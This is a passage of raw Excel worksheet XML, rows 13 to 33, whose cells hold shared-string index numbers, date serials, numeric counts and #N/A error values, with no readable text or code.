        <v>3434</v>
      </c>
      <c r="F13" s="26">
        <v>104</v>
      </c>
      <c r="G13" s="57" t="s">
        <v>3435</v>
      </c>
      <c r="H13" s="1" t="s">
        <v>1736</v>
      </c>
      <c r="I13" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J13" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K13" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L13" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M13" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N13" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O13" s="1"/>
      <c r="P13" s="1"/>
      <c r="Q13" s="1" t="s">
        <v>3632</v>
      </c>
      <c r="R13" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S13" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T13" s="82">
        <v>5247</v>
      </c>
      <c r="U13" s="82">
        <v>7617</v>
      </c>
      <c r="V13" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W13" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="14" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A14" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B14" s="51">
        <v>43790.925171180555</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>3433</v>
      </c>
      <c r="D14" s="26">
        <v>104</v>
      </c>
      <c r="E14" s="1" t="s">
        <v>3437</v>
      </c>
      <c r="F14" s="26">
        <v>104</v>
      </c>
      <c r="G14" s="57" t="s">
        <v>3438</v>
      </c>
      <c r="H14" s="1" t="s">
        <v>3439</v>
      </c>
      <c r="I14" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J14" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K14" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L14" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M14" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N14" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O14" s="1"/>
      <c r="P14" s="1"/>
      <c r="Q14" s="1" t="s">
        <v>3632</v>
      </c>
      <c r="R14" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S14" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T14" s="82">
        <v>4919</v>
      </c>
      <c r="U14" s="82">
        <v>7610</v>
      </c>
      <c r="V14" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W14" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="15" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A15" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B15" s="51">
        <v>43790.925171145835</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>3433</v>
      </c>
      <c r="D15" s="26">
        <v>104</v>
      </c>
      <c r="E15" s="1" t="s">
        <v>3440</v>
      </c>
      <c r="F15" s="26">
        <v>104</v>
      </c>
      <c r="G15" s="57" t="s">
        <v>3441</v>
      </c>
      <c r="H15" s="1" t="s">
        <v>2850</v>
      </c>
      <c r="I15" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J15" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K15" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L15" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M15" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N15" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O15" s="1"/>
      <c r="P15" s="1"/>
      <c r="Q15" s="1" t="s">
        <v>3632</v>
      </c>
      <c r="R15" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S15" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T15" s="82">
        <v>4917</v>
      </c>
      <c r="U15" s="82">
        <v>7617</v>
      </c>
      <c r="V15" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W15" s="1" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="16" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A16" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B16" s="51">
        <v>44326.92819885417</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>86</v>
      </c>
      <c r="D16" s="26">
        <v>130</v>
      </c>
      <c r="E16" s="1" t="s">
        <v>100</v>
      </c>
      <c r="F16" s="26">
        <v>110</v>
      </c>
      <c r="G16" s="57" t="s">
        <v>101</v>
      </c>
      <c r="H16" s="1" t="s">
        <v>102</v>
      </c>
      <c r="I16" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J16" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K16" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L16" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M16" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N16" s="1"/>
      <c r="O16" s="1" t="s">
        <v>105</v>
      </c>
      <c r="P16" s="1"/>
      <c r="Q16" s="1" t="s">
        <v>3635</v>
      </c>
      <c r="R16" s="82">
        <v>1477</v>
      </c>
      <c r="S16" s="82">
        <v>5</v>
      </c>
      <c r="T16" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U16" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V16" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W16" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="17" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A17" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B17" s="51">
        <v>43656.052061863425</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>86</v>
      </c>
      <c r="D17" s="26">
        <v>130</v>
      </c>
      <c r="E17" s="1" t="s">
        <v>115</v>
      </c>
      <c r="F17" s="26">
        <v>112</v>
      </c>
      <c r="G17" s="57" t="s">
        <v>116</v>
      </c>
      <c r="H17" s="1" t="s">
        <v>117</v>
      </c>
      <c r="I17" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J17" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K17" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L17" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M17" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N17" s="1"/>
      <c r="O17" s="1"/>
      <c r="P17" s="1" t="s">
        <v>93</v>
      </c>
      <c r="Q17" s="1" t="s">
        <v>3635</v>
      </c>
      <c r="R17" s="82">
        <v>698</v>
      </c>
      <c r="S17" s="82">
        <v>1</v>
      </c>
      <c r="T17" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U17" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V17" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W17" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="18" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A18" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B18" s="51">
        <v>44327.74064265046</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>137</v>
      </c>
      <c r="D18" s="26">
        <v>110</v>
      </c>
      <c r="E18" s="55" t="s">
        <v>138</v>
      </c>
      <c r="F18" s="26">
        <v>110</v>
      </c>
      <c r="G18" s="57" t="s">
        <v>139</v>
      </c>
      <c r="H18" s="1" t="s">
        <v>140</v>
      </c>
      <c r="I18" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J18" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K18" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L18" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M18" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N18" s="1"/>
      <c r="O18" s="1" t="s">
        <v>141</v>
      </c>
      <c r="P18" s="1"/>
      <c r="Q18" s="1" t="s">
        <v>142</v>
      </c>
      <c r="R18" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S18" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T18" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U18" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V18" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W18" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="19" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A19" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B19" s="51">
        <v>43665.050422777778</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>468</v>
      </c>
      <c r="D19" s="26">
        <v>210</v>
      </c>
      <c r="E19" s="1" t="s">
        <v>469</v>
      </c>
      <c r="F19" s="26">
        <v>210</v>
      </c>
      <c r="G19" s="57" t="s">
        <v>470</v>
      </c>
      <c r="H19" s="1" t="s">
        <v>471</v>
      </c>
      <c r="I19" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J19" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K19" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L19" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M19" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N19" s="1"/>
      <c r="O19" s="1"/>
      <c r="P19" s="1" t="s">
        <v>472</v>
      </c>
      <c r="Q19" s="1" t="s">
        <v>3636</v>
      </c>
      <c r="R19" s="82">
        <v>1260</v>
      </c>
      <c r="S19" s="82">
        <v>427</v>
      </c>
      <c r="T19" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U19" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V19" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W19" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="20" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A20" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B20" s="51">
        <v>43665.050422754626</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>468</v>
      </c>
      <c r="D20" s="26">
        <v>210</v>
      </c>
      <c r="E20" s="55" t="s">
        <v>479</v>
      </c>
      <c r="F20" s="26">
        <v>110</v>
      </c>
      <c r="G20" s="57" t="s">
        <v>480</v>
      </c>
      <c r="H20" s="1" t="s">
        <v>481</v>
      </c>
      <c r="I20" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J20" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K20" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L20" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M20" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N20" s="1"/>
      <c r="O20" s="1" t="s">
        <v>482</v>
      </c>
      <c r="P20" s="1"/>
      <c r="Q20" s="1" t="s">
        <v>3636</v>
      </c>
      <c r="R20" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S20" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T20" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U20" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V20" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W20" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="21" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A21" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B21" s="51">
        <v>43665.050422743057</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>468</v>
      </c>
      <c r="D21" s="26">
        <v>210</v>
      </c>
      <c r="E21" s="1" t="s">
        <v>483</v>
      </c>
      <c r="F21" s="26">
        <v>110</v>
      </c>
      <c r="G21" s="57" t="s">
        <v>484</v>
      </c>
      <c r="H21" s="1" t="s">
        <v>485</v>
      </c>
      <c r="I21" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J21" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K21" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L21" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M21" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N21" s="1"/>
      <c r="O21" s="1" t="s">
        <v>486</v>
      </c>
      <c r="P21" s="1"/>
      <c r="Q21" s="1" t="s">
        <v>3636</v>
      </c>
      <c r="R21" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S21" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T21" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U21" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V21" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W21" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="22" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A22" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B22" s="51">
        <v>44007.689696863425</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>1115</v>
      </c>
      <c r="D22" s="26">
        <v>103</v>
      </c>
      <c r="E22" s="1" t="s">
        <v>1116</v>
      </c>
      <c r="F22" s="26">
        <v>102</v>
      </c>
      <c r="G22" s="57" t="s">
        <v>1117</v>
      </c>
      <c r="H22" s="1" t="s">
        <v>1118</v>
      </c>
      <c r="I22" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J22" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K22" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L22" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M22" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N22" s="1"/>
      <c r="O22" s="1" t="s">
        <v>1119</v>
      </c>
      <c r="P22" s="1"/>
      <c r="Q22" s="1" t="s">
        <v>3637</v>
      </c>
      <c r="R22" s="82">
        <v>737</v>
      </c>
      <c r="S22" s="82">
        <v>686</v>
      </c>
      <c r="T22" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U22" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V22" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W22" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="23" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A23" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B23" s="51">
        <v>44131.418110219907</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>1192</v>
      </c>
      <c r="D23" s="26">
        <v>113</v>
      </c>
      <c r="E23" s="1" t="s">
        <v>1209</v>
      </c>
      <c r="F23" s="26">
        <v>103</v>
      </c>
      <c r="G23" s="57" t="s">
        <v>1210</v>
      </c>
      <c r="H23" s="1" t="s">
        <v>1211</v>
      </c>
      <c r="I23" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J23" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K23" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L23" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M23" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N23" s="1"/>
      <c r="O23" s="1" t="s">
        <v>1212</v>
      </c>
      <c r="P23" s="1"/>
      <c r="Q23" s="1" t="s">
        <v>3638</v>
      </c>
      <c r="R23" s="82">
        <v>291</v>
      </c>
      <c r="S23" s="82">
        <v>237</v>
      </c>
      <c r="T23" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U23" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V23" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W23" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="24" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A24" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B24" s="51">
        <v>44005.711249849533</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>1192</v>
      </c>
      <c r="D24" s="26">
        <v>113</v>
      </c>
      <c r="E24" s="1" t="s">
        <v>1216</v>
      </c>
      <c r="F24" s="26">
        <v>112</v>
      </c>
      <c r="G24" s="57" t="s">
        <v>1217</v>
      </c>
      <c r="H24" s="1" t="s">
        <v>1218</v>
      </c>
      <c r="I24" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J24" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K24" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L24" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M24" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N24" s="1"/>
      <c r="O24" s="1" t="s">
        <v>1219</v>
      </c>
      <c r="P24" s="1"/>
      <c r="Q24" s="1" t="s">
        <v>3638</v>
      </c>
      <c r="R24" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S24" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T24" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U24" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V24" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W24" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="25" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A25" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B25" s="51">
        <v>43566.650861203707</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>1240</v>
      </c>
      <c r="D25" s="26">
        <v>110</v>
      </c>
      <c r="E25" s="1" t="s">
        <v>1241</v>
      </c>
      <c r="F25" s="26">
        <v>110</v>
      </c>
      <c r="G25" s="57" t="s">
        <v>1242</v>
      </c>
      <c r="H25" s="1" t="s">
        <v>1243</v>
      </c>
      <c r="I25" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J25" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K25" s="1" t="s">
        <v>14</v>
      </c>
      <c r="L25" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M25" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N25" s="1" t="s">
        <v>613</v>
      </c>
      <c r="O25" s="1" t="s">
        <v>1244</v>
      </c>
      <c r="P25" s="1"/>
      <c r="Q25" s="1" t="s">
        <v>3639</v>
      </c>
      <c r="R25" s="82">
        <v>56452</v>
      </c>
      <c r="S25" s="82">
        <v>55858</v>
      </c>
      <c r="T25" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U25" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V25" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W25" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="26" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A26" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B26" s="51">
        <v>43566.596765949071</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D26" s="26">
        <v>110</v>
      </c>
      <c r="E26" s="1" t="s">
        <v>1537</v>
      </c>
      <c r="F26" s="26">
        <v>110</v>
      </c>
      <c r="G26" s="57" t="s">
        <v>1538</v>
      </c>
      <c r="H26" s="1" t="s">
        <v>1539</v>
      </c>
      <c r="I26" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J26" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K26" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L26" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M26" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N26" s="1"/>
      <c r="O26" s="1" t="s">
        <v>1540</v>
      </c>
      <c r="P26" s="1"/>
      <c r="Q26" s="1" t="s">
        <v>3640</v>
      </c>
      <c r="R26" s="82">
        <v>4113</v>
      </c>
      <c r="S26" s="82">
        <v>2526</v>
      </c>
      <c r="T26" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U26" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V26" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W26" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="27" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A27" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B27" s="51">
        <v>44314.92263760417</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D27" s="26">
        <v>231</v>
      </c>
      <c r="E27" s="1" t="s">
        <v>1537</v>
      </c>
      <c r="F27" s="26">
        <v>120</v>
      </c>
      <c r="G27" s="57" t="s">
        <v>1538</v>
      </c>
      <c r="H27" s="1" t="s">
        <v>1539</v>
      </c>
      <c r="I27" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J27" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K27" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L27" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M27" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N27" s="1"/>
      <c r="O27" s="1" t="s">
        <v>105</v>
      </c>
      <c r="P27" s="1"/>
      <c r="Q27" s="1" t="s">
        <v>3641</v>
      </c>
      <c r="R27" s="82">
        <v>31036</v>
      </c>
      <c r="S27" s="82">
        <v>31787</v>
      </c>
      <c r="T27" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U27" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V27" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W27" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="28" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A28" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B28" s="51">
        <v>44314.92263760417</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D28" s="26">
        <v>310</v>
      </c>
      <c r="E28" s="1" t="s">
        <v>1537</v>
      </c>
      <c r="F28" s="26">
        <v>200</v>
      </c>
      <c r="G28" s="57" t="s">
        <v>1538</v>
      </c>
      <c r="H28" s="1" t="s">
        <v>1539</v>
      </c>
      <c r="I28" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J28" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K28" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L28" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M28" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N28" s="1"/>
      <c r="O28" s="1" t="s">
        <v>105</v>
      </c>
      <c r="P28" s="1"/>
      <c r="Q28" s="1" t="s">
        <v>142</v>
      </c>
      <c r="R28" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S28" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T28" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U28" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V28" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W28" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="29" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A29" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B29" s="51">
        <v>43566.596766041665</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D29" s="26">
        <v>110</v>
      </c>
      <c r="E29" s="1" t="s">
        <v>1543</v>
      </c>
      <c r="F29" s="26">
        <v>110</v>
      </c>
      <c r="G29" s="57" t="s">
        <v>1544</v>
      </c>
      <c r="H29" s="1" t="s">
        <v>1545</v>
      </c>
      <c r="I29" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J29" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K29" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L29" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M29" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N29" s="1"/>
      <c r="O29" s="1" t="s">
        <v>1540</v>
      </c>
      <c r="P29" s="1"/>
      <c r="Q29" s="1" t="s">
        <v>3640</v>
      </c>
      <c r="R29" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S29" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T29" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U29" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V29" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W29" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="30" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A30" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B30" s="51">
        <v>44349.88022298611</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D30" s="26">
        <v>231</v>
      </c>
      <c r="E30" s="1" t="s">
        <v>1543</v>
      </c>
      <c r="F30" s="26">
        <v>201</v>
      </c>
      <c r="G30" s="57" t="s">
        <v>1544</v>
      </c>
      <c r="H30" s="1" t="s">
        <v>1545</v>
      </c>
      <c r="I30" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J30" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K30" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L30" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M30" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N30" s="1"/>
      <c r="O30" s="1" t="s">
        <v>1546</v>
      </c>
      <c r="P30" s="1"/>
      <c r="Q30" s="1" t="s">
        <v>3641</v>
      </c>
      <c r="R30" s="82">
        <v>3051</v>
      </c>
      <c r="S30" s="82">
        <v>405</v>
      </c>
      <c r="T30" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U30" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V30" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W30" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="31" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A31" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B31" s="51">
        <v>44349.88022298611</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D31" s="26">
        <v>310</v>
      </c>
      <c r="E31" s="1" t="s">
        <v>1543</v>
      </c>
      <c r="F31" s="26">
        <v>310</v>
      </c>
      <c r="G31" s="57" t="s">
        <v>1544</v>
      </c>
      <c r="H31" s="1" t="s">
        <v>1545</v>
      </c>
      <c r="I31" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J31" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K31" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L31" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M31" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N31" s="1"/>
      <c r="O31" s="1" t="s">
        <v>1546</v>
      </c>
      <c r="P31" s="1"/>
      <c r="Q31" s="1" t="s">
        <v>142</v>
      </c>
      <c r="R31" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S31" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T31" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U31" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V31" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W31" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="32" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A32" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B32" s="51">
        <v>43566.596765983799</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D32" s="26">
        <v>110</v>
      </c>
      <c r="E32" s="1" t="s">
        <v>1547</v>
      </c>
      <c r="F32" s="26">
        <v>110</v>
      </c>
      <c r="G32" s="57" t="s">
        <v>1548</v>
      </c>
      <c r="H32" s="1" t="s">
        <v>1549</v>
      </c>
      <c r="I32" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J32" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K32" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L32" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M32" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N32" s="1"/>
      <c r="O32" s="1" t="s">
        <v>1550</v>
      </c>
      <c r="P32" s="1"/>
      <c r="Q32" s="1" t="s">
        <v>3640</v>
      </c>
      <c r="R32" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="S32" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="T32" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="U32" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V32" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W32" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="33" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A33" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B33" s="51">
        <v>44349.880223009262</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="D33" s="26">
        <v>231</v>
      </c>
      <c r="E33" s="1" t="s">
        <v>1547</v>
      </c>
      <c r="F33" s="26">
        <v>211</v>
      </c>
      <c r="G33" s="57" t="s">
        <v>1548</v>
      </c>
      <c r="H33" s="1" t="s">
        <v>1549</v>
      </c>
      <c r="I33" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J33" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K33" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L33" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M33" s="1" t="s">
